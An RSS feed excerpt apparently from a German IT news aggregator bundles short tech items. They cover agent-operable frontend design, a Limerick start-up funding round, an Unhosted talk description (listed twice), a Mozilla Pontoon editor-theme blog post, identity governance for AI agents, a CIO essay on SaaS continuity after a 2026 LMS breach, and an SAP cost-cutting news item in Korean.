<p>Humans can tolerate ambiguous UI. Agents cannot. Every point of ambiguity is a probability distribution over possible actions, and probability distributions can produce wrong actions at scale.<strong></strong></p>



<p>For frontend teams thinking about this now, there are three places to start.</p>



<ol class="wp-block-list">
<li><strong>Make state visible.</strong> Every piece of client state that affects whether an action is available should be reflected in the accessibility tree, not just rendered visually. If your cart count updates in a state store but the button’s aria-label doesn’t update with it, an agent is operating on stale information. ARIA synchronization isn’t an enhancement; it’s part of the interface contract.</li>



<li><strong>Make identifiers stable.</strong> CSS modules and build-time hashing produce class names that change on every deploy and are meaningless as selectors. A data attribute convention with stable, human-readable identifiers—such as checkout.submit_order gives agent runtimes something to target that survives refactors, redesigns and framework migrations. I have added a lint rule that fails the build when interactive elements are missing one.</li>



<li><strong>Make actions explicit.</strong> Today, what an element does lives entirely in JavaScript, opaque to any outside observer. The direction WebMCP points toward, and what I would encourage teams to start thinking about now, is exposing action intent alongside UI semantics: What an action is called, what inputs it accepts, what preconditions it requires and what effects it produces. Even without a formal protocol, a consistent schema gives agent runtimes something to reason about rather than infer.</li>
</ol>



<p>I have started thinking of agent operability as a strict superset of accessibility. Tools like <a href="https://github.com/dequelabs/axe-core">axe-core</a> already catch a meaningful share of agent failures because they validate the semantic layer agents depend on. The WebMCP team’s proposed Lighthouse audit for the agentic web is the natural next layer.<strong></strong></p>



<h2 class="wp-block-heading"><a></a>The completion of work already started</h2>



<p>HTML gave us a machine-readable structure. ARIA and the Accessibility Object Model gave us machine-readable meaning. What agents need next is machine-readable capability: Not just what a control <em>is</em>, but what it <em>does</em>, under what conditions and with what effect.</p>



<p>Teams that invested in accessibility did not just build more inclusive products. They also built the closest thing to agent-compatible UIs on the web. WebMCP makes that inheritance explicit: Labels become parameter descriptions, ARIA metadata becomes agent metadata and semantic structure becomes the foundation for machine execution.</p>



<p>Assistive technologies proved the thesis decades ago: Machines can navigate interfaces, semantics can outlive presentation and structure can substitute for vision. This isn’t a new protocol. It is the completion of work that ARIA and the Accessibility Object Model started – turning machine-readable descriptions into contracts that agents can execute against reliably.</p>



<p>.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.infoworld.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Limerick operations AI start-up WrxFlo raises €3m]]></title>
<description><![CDATA[The investment will be used for expansion in the UK and US, continued development of WrxFlo's SaaS platform, and supporting ambitions to grow from 60 to 200 employees by 2028, the company said.
Read more: Limerick operations AI start-up WrxFlo raises €3m]]></description>
<link>https://tsecurity.de/de/3650846/it-nachrichten/limerick-operations-ai-start-up-wrxflo-raises-3m/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650846/it-nachrichten/limerick-operations-ai-start-up-wrxflo-raises-3m/</guid>
<pubDate>Tue, 07 Jul 2026 10:18:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The investment will be used for expansion in the UK and US, continued development of WrxFlo's SaaS platform, and supporting ambitions to grow from 60 to 200 employees by 2028, the company said.</p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/start-ups/limerick-operations-ai-start-up-wrxflo-raises-e3m">Limerick operations AI start-up WrxFlo raises €3m</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Unhosted project (ds2011)]]></title>
<description><![CDATA[here’s a short description of Unhosted. In the talk we can also focus more
on privacy, data security etc.

We distinguish two kinds of online applications: hosted and unhosted. An
unhosted web app differs from a hosted web app (a standard website or SaaS
app) in where it gets its resources. We di...]]></description>
<link>https://tsecurity.de/de/3650195/it-security-video/the-unhosted-project-ds2011/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650195/it-security-video/the-unhosted-project-ds2011/</guid>
<pubDate>Tue, 07 Jul 2026 02:32:46 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[here’s a short description of Unhosted. In the talk we can also focus more
on privacy, data security etc.

We distinguish two kinds of online applications: hosted and unhosted. An
unhosted web app differs from a hosted web app (a standard website or SaaS
app) in where it gets its resources. We distinguish four kinds of
resources for an online application:
* source code (the application itself)
* processing (CPU cycles)
* persistent storage (including versioning and provisioning of
state-change notifications)
* presentation (managing both output to and input from user)
In a hosted web app, the architecture is client-server. The client takes
care of presentation, and the server fulfills the other three roles. In an
unhosted web app, the architecture is client / per-app server / per-user
storage. The client does presentation and processing, the server does only
source code, and the storage node does the persistent storage.

The reason we move the processing to the client is that we want to
minimize the strain on the server. This way, apps become more scalable
(less additional resources are needed on the central server per added
user). By making apps more scalable we hope to give a fairer chance to
free software projects, who often have a lot of brains on board to write
good code, but not as much money to provide processing power as
proprietary competitors.
The reason we move the persistent storage away from where the source code
is, is that we want to use per-app source code, but per-user storage
resources. This has three advantages:
* it allows the user to have control over their data
* it makes the web more robust (it largely removes the single point of
failures that websites often form)
* it moves the running costs from the app author to the app user, which
makes much more sense, and will benefit free software.
about this event: https://datenspuren.de/2011/fahrplan/events/4612.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[The Unhosted project (ds2011)]]></title>
<description><![CDATA[here’s a short description of Unhosted. In the talk we can also focus more
on privacy, data security etc.

We distinguish two kinds of online applications: hosted and unhosted. An
unhosted web app differs from a hosted web app (a standard website or SaaS
app) in where it gets its resources. We di...]]></description>
<link>https://tsecurity.de/de/3650173/it-security-video/the-unhosted-project-ds2011/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650173/it-security-video/the-unhosted-project-ds2011/</guid>
<pubDate>Tue, 07 Jul 2026 02:18:27 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[here’s a short description of Unhosted. In the talk we can also focus more
on privacy, data security etc.

We distinguish two kinds of online applications: hosted and unhosted. An
unhosted web app differs from a hosted web app (a standard website or SaaS
app) in where it gets its resources. We distinguish four kinds of
resources for an online application:
* source code (the application itself)
* processing (CPU cycles)
* persistent storage (including versioning and provisioning of
state-change notifications)
* presentation (managing both output to and input from user)
In a hosted web app, the architecture is client-server. The client takes
care of presentation, and the server fulfills the other three roles. In an
unhosted web app, the architecture is client / per-app server / per-user
storage. The client does presentation and processing, the server does only
source code, and the storage node does the persistent storage.

The reason we move the processing to the client is that we want to
minimize the strain on the server. This way, apps become more scalable
(less additional resources are needed on the central server per added
user). By making apps more scalable we hope to give a fairer chance to
free software projects, who often have a lot of brains on board to write
good code, but not as much money to provide processing power as
proprietary competitors.
The reason we move the persistent storage away from where the source code
is, is that we want to use per-app source code, but per-user storage
resources. This has three advantages:
* it allows the user to have control over their data
* it makes the web more robust (it largely removes the single point of
failures that websites often form)
* it moves the running costs from the app author to the app user, which
makes much more sense, and will benefit free software.
about this event: https://datenspuren.de/2011/fahrplan/events/4612.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla Localization (L10N): Giving Pontoon’s Editor Its Own Theme]]></title>
<description><![CDATA[Each year, Mozilla welcomes interns who work alongside our engineering teams on projects that ship to production and improve the experience for contributors around the world. This year, Ayush joined the Firefox Localization team to work on Pontoon, Mozilla’s open source localization platform, whe...]]></description>
<link>https://tsecurity.de/de/3649455/tools/mozilla-localization-l10n-giving-pontoons-editor-its-own-theme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649455/tools/mozilla-localization-l10n-giving-pontoons-editor-its-own-theme/</guid>
<pubDate>Mon, 06 Jul 2026 19:06:41 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<blockquote>
<p class="PDq2pG_selectionAnchorContainer">Each year, Mozilla welcomes interns who work alongside our engineering teams on projects that ship to production and improve the experience for contributors around the world. This year, Ayush joined the Firefox Localization team to work on Pontoon, Mozilla’s open source localization platform, where he already tackled several user-facing improvements while learning how large-scale open source software is built.</p>
<p>In this post, Ayush shares the story behind one of his first projects: giving Pontoon’s translation editor its own appearance settings. From understanding long-standing design decisions to balancing accessibility with user expectations, he walks through both the technical implementation and the product thinking that shaped the feature.</p>
<p class="isSelectedEnd">You can follow Ayush’s work on <a href="https://github.com/ayshushus">GitHub</a> and connect with him on <a href="https://www.linkedin.com/in/ayshushus">LinkedIn</a>.</p>
</blockquote>
<h3>Introduction</h3>
<p>Studying <a href="https://future.utoronto.ca/program/computer-engineering">Computer Engineering</a> with a <a href="https://discover.engineering.utoronto.ca/experiential-learning/professional-experience-year-pey/">Professional Experience Year (PEY)</a> at the <a href="https://www.engineering.utoronto.ca/">University of Toronto’s Faculty of Applied Science</a> gave me a variety of opportunities and companies to choose spending a year interning at. I chose Software Engineering at <a href="https://www.mozilla.org/">Mozilla</a> because it’s an open source company that puts people first, which matters to me a lot and allows me to equip my portfolio using snippets and examples from real code used in production.</p>
<p>I joined <a href="https://language.mozilla.org/">Mozilla’s Firefox Localization (l10n) team</a> as part of <a href="https://www.mozilla.org/foundation/moco/">Mozilla Corporation</a>’s Firefox Desktop Engineering Team, based in Downtown Toronto. I officially began my internship on Friday, May 1, 2026, but I unofficially began in mid February. Since my team’s flagship product’s (<a href="https://pontoon.mozilla.org/">Pontoon</a>) codebase is entirely open source, I talked to both my <a href="https://github.com/flodolo">manager</a> and <a href="https://github.com/mathjazz">Pontoon owner</a> right after signing my offer and got early access to our weekly meetings and some confidential data. I then started to learn as much as I possibly could.</p>
<p><a href="https://blog.mozilla.org/l10n/files/2026/07/image7.png"><img alt="" class="alignnone size-full wp-image-1889" height="856" src="https://blog.mozilla.org/l10n/files/2026/07/image7.png" width="1662"></a></p>
<p>Even before I started learning the <a href="https://github.com/mozilla/pontoon">codebase</a>, just looking at the Pontoon’s default translation UI was rather interesting because of our editor pane’s glaring white color in dark mode/theme.</p>
<p><a href="https://blog.mozilla.org/l10n/files/2026/07/image3.png"><img alt="" class="alignnone size-full wp-image-1890" height="950" src="https://blog.mozilla.org/l10n/files/2026/07/image3.png" width="1664"></a></p>
<p>Even though I saw the <a href="https://github.com/mozilla/pontoon/issues/4001">issue (#4001)</a> filed for working on that, I thought that the stark contrast was a stylistic choice because an average user would spend most of their time on said pane editing strings anyway, so I just went on with it.</p>
<p><a href="https://blog.mozilla.org/l10n/files/2026/07/image11.png"><img alt="" class="alignnone size-full wp-image-1891" height="794" src="https://blog.mozilla.org/l10n/files/2026/07/image11.png" width="1664"></a></p>
<p>However, once I officially started to work, I got my onboarding document and saw my starting set of issues. That’s where I came across the very same <a href="https://github.com/mozilla/pontoon/issues/4001">issue (#4001)</a> on my todo batch, which made me very happy since I could address it and I’d already looked at the surrounding context before working with it.</p>
<h3>The Original Experience</h3>
<p>At first, the user could only change Pontoon’s appearance from their `profile menu` or <a href="https://pontoon.mozilla.org/settings/">Pontoon’s `/settings` page</a>. This is where they have the ability to change their appearance to `dark mode`, `light mode`, or keep the `system theme` that matches their device’s preferences.</p>
<div class="wp-caption alignnone"><a href="https://blog.mozilla.org/l10n/files/2026/07/image10.png"><img alt="" class="wp-image-1892 size-full" height="362" src="https://blog.mozilla.org/l10n/files/2026/07/image10.png" width="1308"></a><p class="wp-caption-text">This is the view from Pontoon’s Settings page.</p></div>
<div class="wp-caption alignnone"><a href="https://blog.mozilla.org/l10n/files/2026/07/image2.png"><img alt="" class="wp-image-1893 size-full" height="1046" src="https://blog.mozilla.org/l10n/files/2026/07/image2.png" width="1154"></a><p class="wp-caption-text">This is the view from Pontoon’s Profile menu.</p></div>
<div class="wp-caption alignnone"><a href="https://blog.mozilla.org/l10n/files/2026/07/image1.png"><img alt="" class="wp-image-1894 size-full" height="1126" src="https://blog.mozilla.org/l10n/files/2026/07/image1.png" width="1999"></a><p class="wp-caption-text">Ironically, the dark appearance warrants a light themed `editor pane`.</p></div>
<div class="wp-caption alignnone"><a href="https://blog.mozilla.org/l10n/files/2026/07/image9.png"><img alt="" class="size-full wp-image-1895" height="628" src="https://blog.mozilla.org/l10n/files/2026/07/image9.png" width="1782"></a><p class="wp-caption-text">There is also no option to change the `editor pane` appearance from the `editor menu`.</p></div>
<h3>Design Considerations</h3>
<p>In general, when a product has a large, established user base that has grown accustomed to a particular interface, it’s important to approach visual changes with care. Even if a redesign is arguably more visually appealing and offers clear accessibility benefits, changing familiar workflows and appearance can still disrupt the user experience.</p>
<p>In fact, according to <a href="https://research.mozilla.org/">this Mozilla Research</a> article I read, which explored <a href="https://research.mozilla.org/browser-competition/remedyconcepts/">browser choice design interventions</a>, “It is important that the organizations tasked with designing and regulating current and future interventions (including browser choice screens) are mindful of the design principles we have articulated with this research.”</p>
<p>Even though the relevance of said <a href="https://research.mozilla.org/browser-competition/remedyconcepts/">research</a> is for the browser use-case, the impacts are for a user interface design like in this blog, as the article also mentions “The inertia is a strong force to overcome”, and Pontoon’s inertia dates back over a decade.</p>
<p>This meant that if we were to change the editor pane color, we would have to allow the user to have things as they currently are.</p>
<h3>The New Experience</h3>
<p>In the update Appearance section of the <a href="https://pontoon.mozilla.org/settings/">Settings page</a>, users have the ability to change the main interface as before, but now have the ability to update editor to `dark mode`, `light mode`, or match their `main interface theme` to automatically sync the colors.</p>
<p>The editor theme remains light by default, regardless of the main interface theme.</p>
<div class="wp-caption alignnone"><a href="https://blog.mozilla.org/l10n/files/2026/07/image5.png"><img alt="" class="size-full wp-image-1896" height="652" src="https://blog.mozilla.org/l10n/files/2026/07/image5.png" width="1590"></a><p class="wp-caption-text">This is the view from Pontoon’s Settings page.</p></div>
<div class="wp-caption alignnone"><a href="https://blog.mozilla.org/l10n/files/2026/07/image8.png"><img alt="" class="size-full wp-image-1897" height="896" src="https://blog.mozilla.org/l10n/files/2026/07/image8.png" width="1712"></a><p class="wp-caption-text">Editor appearance can also be quickly changed from the editor menu.</p></div>
<div class="wp-caption alignnone"><a href="https://blog.mozilla.org/l10n/files/2026/07/image6.png"><img alt="" class="size-full wp-image-1898" height="890" src="https://blog.mozilla.org/l10n/files/2026/07/image6.png" width="1694"></a><p class="wp-caption-text">This UI now matches the dark theme, either by explicitly selecting it or matching the main interface theme.</p></div>
<div class="wp-caption alignnone"><a href="https://blog.mozilla.org/l10n/files/2026/07/image4.png"><img alt="" class="size-full wp-image-1899" height="914" src="https://blog.mozilla.org/l10n/files/2026/07/image4.png" width="1698"></a><p class="wp-caption-text">Since the issue was with `dark interface mode` having a `light editor`, setting the default `editor` to `light` neatly agreed with how the UI looked before the changes were brought in.</p></div>
<h3>Looking Ahead</h3>
<p>These changes neatly allow the user to modify their theme keeping their general preferences in mind. The change is also remembered by Pontoon and stays consistent at every instance the user logs back in.</p>
<p>Furthermore, we now track if the user has interacted with the `editor theme` which gives us knowledge on if we want to eventually change the default editor theme, addressing the concerns of `UI inertia` brought up in <a href="https://research.mozilla.org/browser-competition/remedyconcepts/">Mozilla’s research</a>.</p>
<p>For more information and technical details, please visit: <a href="https://www.ayshush.us/mozilla/issue-notes/4001">https://www.ayshush.us/mozilla/issue-notes/4001</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Identity: The operational control plane for agentic AI]]></title>
<description><![CDATA[Existing security controls weren’t designed for AI agents.



Static credentials and standing privileges aren’t sufficient for an emerging model where organizations need to rapidly authorize, limit, and revoke permissions from autonomous agents, sometimes more than once within a single workflow.
...]]></description>
<link>https://tsecurity.de/de/3649122/it-security-nachrichten/identity-the-operational-control-plane-for-agentic-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649122/it-security-nachrichten/identity-the-operational-control-plane-for-agentic-ai/</guid>
<pubDate>Mon, 06 Jul 2026 16:54:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Existing security controls weren’t designed for AI agents.</p>



<p>Static credentials and standing privileges aren’t sufficient for an emerging model where organizations need to rapidly authorize, limit, and revoke permissions from autonomous agents, sometimes more than once within a single workflow.</p>



<p>Agentic AI requires organizations to carefully consider how to govern agentic identity, agent-to-agent communication, secrets management, privileged access, and workforce identity.</p>



<h1 class="wp-block-heading">Agentic identity</h1>



<p>The first challenge is to establish a reliable identity for agents themselves.</p>



<p>The “how” here is still being hotly debated. Some organizations treat AI agents as another form of non-human identity, similar to service accounts or machine identities. Others argue that agents should be their own category, distinct from both human users and machine accounts.</p>



<p>In any case, agents need something like a “certificate” to give them an identity that can be recognized and governed across environments. This is especially important because, in most enterprises, agents will operate across multiple environments, including cloud platforms, on-premises systems, and SaaS applications. </p>



<h1 class="wp-block-heading">Agent-to-agent communication</h1>



<p>Securing agentic AI requires organizations to limit not only which resources AI agents can access, but also which <em>other </em>access-enabled agents they can communicate with. This is often currently handled with Model Context Protocol (MCP) gateways, although this approach is largely giving way to the use of agentic mesh.</p>



<p>An agentic mesh is a distributed architecture where multiple specialized AI agents can discover one another, coordinate, and collaborate on tasks without a central controller. This approach lets organizations overlay intent-based communication rules via certificates, but also allows permissions to be revoked on demand.</p>



<h1 class="wp-block-heading">Agentic secrets</h1>



<p>Traditionally, secrets like passwords and API keys are managed via requests through IT service management platforms. But this mechanism doesn’t work for AI agents, which operate too quickly and across too many systems to rely on static credentials.</p>



<p>Instead, secrets should be generated dynamically, used for a specific purpose, and then retired when the task is complete. This approach can be compared to modern hotel key cards. Unlike the physical room keys of the past, a key card is issued for a specific stay, but after that, it becomes worthless to both legitimate users and malicious actors.</p>



<h1 class="wp-block-heading">Privileged access</h1>



<p>AI agents may start with the same permissions as a given human user, drawing on relevant business systems and data for context. However, as workflows get handed off from agent to agent, this privilege should not be passed along throughout the process. Rather, privileges should be whittled down at each stage until only a thin layer remains to authorize a specific execution step.</p>



<h1 class="wp-block-heading">Workforce identity</h1>



<p>Organizations already manage the identities of human workers, of course, but often these identities are handled differently across separate management platforms and sign-on tools. To support agentic AI, organizations must find ways to break through this fragmentation, ensure that worker identities are current, and translate workforce permissions correctly into agentic workflows.</p>



<h1 class="wp-block-heading">A lifecycle approach to identity</h1>



<p>These five areas should not be addressed in isolation. Rather, organizations should apply governance and observability across the identity lifecycle, ensuring that every agentic action can ultimately be traced back to approved access and permission levels.</p>



<p>The outcomes of this effort—including dynamic access, the principle of least privilege, strong identity, and clear auditability—are goals that many organizations have long been pursuing. The rise of agentic AI makes them more urgent than ever. </p>



<p>To learn more, visit us <a href="https://url.usb.m.mimecastprotect.com/s/JmXpCVJDNDFOzA4ZfGf1cEukO9?domain=ibm.com">here</a>.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Single points of failure fail. The SaaS layer is not an exception]]></title>
<description><![CDATA[Higher education has consolidated its entire academic operation into a handful of massive SaaS platforms. The LMS manages instruction, grading and communication. The SIS owns enrollment, records and financial aid. Identity and productivity live in a small number of cloud providers. These are not ...]]></description>
<link>https://tsecurity.de/de/3648395/it-security-nachrichten/single-points-of-failure-fail-the-saas-layer-is-not-an-exception/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648395/it-security-nachrichten/single-points-of-failure-fail-the-saas-layer-is-not-an-exception/</guid>
<pubDate>Mon, 06 Jul 2026 12:08:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Higher education has consolidated its entire academic operation into a handful of massive SaaS platforms. The LMS manages instruction, grading and communication. The SIS owns enrollment, records and financial aid. Identity and productivity live in a small number of cloud providers. These are not peripheral tools — they are the operational infrastructure of the institution. As IT stewards, we manage platforms we do not own, cannot restore ourselves and cannot directly control — which makes contingency planning not optional, but fundamental to the role.</p>



<p>The contracts are in place. The SLAs are signed. The compliance certifications are current. None of that matters to a student who cannot reach her instructor three days before finals. None of it matters to a faculty member who has no roster, no grade book and no way to document the work his students submitted before the platform went dark. SLAs govern vendor response timelines. Keeping academic operations running during that response window is IT’s responsibility.</p>



<p>The disruption hit during finals week 2026, and I was doing what every CIO in higher education was doing — monitoring. A major learning management system <a href="https://www.csoonline.com/article/4180194/lessons-from-the-canvas-cyberattack.html">had been breached</a>. The disruption spread fast. Finals were canceled. Exams were postponed. Students and staff were stranded without access to coursework, rosters or grade books. The costs — in academic disruption, extended contracts, emergency response — were substantial and widely reported. My institution was not directly impacted. But watching peer institutions in my own state go dark during the highest-stakes moment of the academic calendar was not reassuring. It was a confirmation of something I had been thinking about for a long time.</p>



<p>The disruption proved something IT professionals have relearned in every decade of their careers. Mark Twain observed that history does not repeat itself, but it does rhyme. This is a verse we have heard before: Dependence on a single point of failure, without a tested contingency plan, is not a strategy — it is a risk that has simply not yet been called. Whether the failure comes from a cyberattack, a vendor outage, an infrastructure collapse or a cloud provider’s bad deployment, the result is the same. The institution stops. And no SLA, contract or compliance certification prevents that moment from arriving.</p>



<p>Vigilance is not optional. Technologies are evolving faster than any IT team can fully anticipate. New platforms, new integrations, new dependencies emerge constantly — and with each one comes a new potential failure point. That is not an argument against adopting new technology. It is an argument for the one principle that never becomes obsolete: Reliance on any single critical system, whether it is a connectivity provider, an identity platform or a SaaS solution, is a proven strategy for failure. The question is never whether that system will fail. The question is whether the institution is prepared when it does.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Single points of failure fail — inevitably, and at the worst possible time. IT professionals have known this for thirty years. The SaaS layer is not exempt.</p>
</blockquote>



<p>This is not a new lesson. Azure has gone down. AWS has failed. <a href="https://er.educause.edu/articles/2026/5/how-higher-education-is-responding-to-the-canvas-lms-incident-and-preparing-for-whats-next">Google Workspace has had outages that took organizations dark globally</a>. No campus runs a single ISP connection — we provision redundant circuits, preferably from independent providers, because we learned long ago that the connection will sometimes fail and the institution cannot afford to stop when it does. Financial services, government and multinational enterprises applied that same logic to every dependency in their stack. Their response to platform risk was not to demand better SLAs. It was to architect around the dependency. Redundancy. Failover. Independent continuity capability. The massive disruptions from Canvas demonstrate that effective contingency solutions for these critical platforms have not kept pace with our dependence on them. We cannot get fooled again.</p>



<p>That omission is what made the 2026 attack so damaging. Not the sophistication of the breach — the entry point was a peripheral free-tier environment that wasn’t even within the vendor’s primary certification scope. The damage was catastrophic because institutions had no fallback. Faculty had no rosters. Administrators had no enrollment data. There was no continuity layer. A single point of failure, at institutional scale, with no plan for when it fails.</p>



<p>And now the economics have shifted in the worst possible direction. <a href="https://techcrunch.com/2025/05/08/powerschool-paid-a-hackers-ransom-but-now-schools-say-they-are-being-extorted/">PowerSchool paid a ransom in December 2024</a> after attackers stole data on 60 million students — and was re-extorted anyway, with individual school districts receiving separate demands months later using the same stolen data. <a href="https://www.instructure.com/incident_update">Instructure’s CEO publicly confirmed the extortion payment</a>. Anyone who has paid a ransom only to be hit a second time at double the cost can tell you — paying the attackers resolves nothing and instead invites more attacks. The sector has now proven twice, publicly, and at scale, that it will pay. That changes the threat calculus entirely. Higher education stops being a target of opportunity and becomes a target of strategy. Criminal groups share that intelligence. Banner serves over 1,400 institutions. Blackboard reaches tens of millions of users across thousands of campuses. Every major higher education SaaS platform is now on active threat actor priority lists — not because they are newly vulnerable, but because the sector has proven it will pay, that academic calendar pressure creates maximum leverage, and that IT has not yet built the operational alternative that our dependence on these platforms demands — and therefore the failure is ours to own, especially if we allow it to happen a second time.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>The sector has proven it will pay. Every ransomware group operating today just received the same market signal. What follows is not unpredictable — it is documented, underway and aimed directly at the platforms carrying your institution’s academic operations.</p>
</blockquote>



<p>As a CIO, my approach to this is not a spreadsheet or a stack of printed reports. IT is responsible for identifying critical failure points and countering them — that is not optional; it is the job. Accepting failure as inevitable without a mitigation strategy is not viable. Redundancy and continuity solutions are standard practice everywhere else in our infrastructure. There was no reason the SaaS layer should be different.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>A leader’s first job isn’t to be right — it’s to be responsible.</p>
</blockquote>



<p>The solution I implemented is a secure, read-only, centralized repository — a continuity strategy that ensures students, staff and faculty can continue to function whether the issue is a power outage, a cyberattack or a SaaS platform going dark. It is not a replacement for Canvas or Banner. It is the independent fallback that allows the institution to keep operating while the primary system is restored. I have learned the hard way that accepting failure without a plan is not a posture any CIO can defend.</p>



<p>Watching the frustration across the industry during and after the 2026 attack — institutions paralyzed, peer CIOs improvising, faculty working from personal spreadsheets, boards asking questions no one could answer — the logic of extending this capability to other institutions became unavoidable. The solution is not complex. The architecture is straightforward. The discipline behind it is thirty years old. The discipline is established. The responsibility to apply it is our field of expertise in IT.</p>



<p>To be precise about scope: An ACR does not prevent vendor breaches, replace cyber insurance or remove notification obligations. When an incident hits, legal counsel, security teams and institutional leadership still manage the response. What the ACR changes is what they have to work with — a governed, auditable record of what data was accessed, what manual actions were taken and how operations continued while the vendor worked to restore service.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Redundancy, disaster recovery, continuity of operations — the discipline is not new. The SaaS platforms carrying academic operations deserve the same standard we hold everywhere else.</p>
</blockquote>



<p>The solution to this problem exists. A SaaS third-party continuity of operations strategy requires an independent data layer — one the institution controls, synchronized on a regular scheduled cycle from source systems, and accessible when those systems are not. Platform-agnostic across Canvas, Banner, Blackboard and PowerSchool. Read-only by design. Auditable by requirement. Independent by architecture. That last word is the one that matters — independent of the platforms whose availability you cannot guarantee.</p>



<p>Every CIO in higher education knows what a single point of failure looks like. Every one of us has built around them at every other layer. Servers, networks, data centers — we do not accept the single-point risk, and we do not wait for the failure to motivate the fix. The SaaS layer is not an exception.</p>



<p>The question is not whether your institution will face it. The question is whether you will have a continuity strategy in place when it arrives — or be explaining to your board why you did not.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Leaders don’t rent accountability — they own it outright.</p>
</blockquote>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[채용·출장비 줄인 SAP, AI 투자 재원 확보 나서]]></title>
<description><![CDATA[SAP가 AI 전환에 필요한 재원을 마련하기 위해 채용과 출장 비용을 줄인다.



블룸버그에 따르면 SAP는 최근 사내 이메일을 통해 “장기적인 성공에 핵심적인 AI 직무를 중심으로 일부 직군에 한해서만 신규 채용을 진행할 것”이라고 직원들에게 공지했다.



또 AI 개발과 직접 관련된 경우를 제외한 내부 출장을 중단하고, 협력업체 관련 비용을 포함한 다른 지출을 줄이는 방안도 검토하고 있다고 밝혔다.



SAP 대변인은 CIO.com에 이 같은 내용을 확인하며 “SAP는 고객에게 장기적인 가치와 혁신을 제공할 수 있는 ...]]></description>
<link>https://tsecurity.de/de/3648255/it-security-nachrichten/sap-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648255/it-security-nachrichten/sap-ai/</guid>
<pubDate>Mon, 06 Jul 2026 11:10:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>SAP가 AI 전환에 필요한 재원을 마련하기 위해 채용과 출장 비용을 줄인다.</p>



<p><a href="https://www.bloomberg.com/news/articles/2026-07-02/sap-restricts-hiring-travel-to-fund-significant-ai-push" target="_blank" rel="nofollow">블룸버그에 따르면</a> SAP는 최근 사내 이메일을 통해 “장기적인 성공에 핵심적인 AI 직무를 중심으로 일부 직군에 한해서만 신규 채용을 진행할 것”이라고 직원들에게 공지했다.</p>



<p>또 AI 개발과 직접 관련된 경우를 제외한 내부 출장을 중단하고, 협력업체 관련 비용을 포함한 다른 지출을 줄이는 방안도 검토하고 있다고 밝혔다.</p>



<p>SAP 대변인은 CIO.com에 이 같은 내용을 확인하며 “SAP는 고객에게 장기적인 가치와 혁신을 제공할 수 있는 분야에 자원을 집중하기 위해 투자 현황을 지속적으로 점검하고 있다”라며 “이러한 방침에 따라 AI 관련 역량과 인재, 기술에 대한 투자를 우선하는 한편, 채용과 외부 지출, 내부 출장은 더욱 엄격하게 관리하고 있다. 고객 대상 활동과 핵심 AI 프로젝트는 기존과 동일하게 전폭적으로 지원할 것”이라고 설명했다.</p>



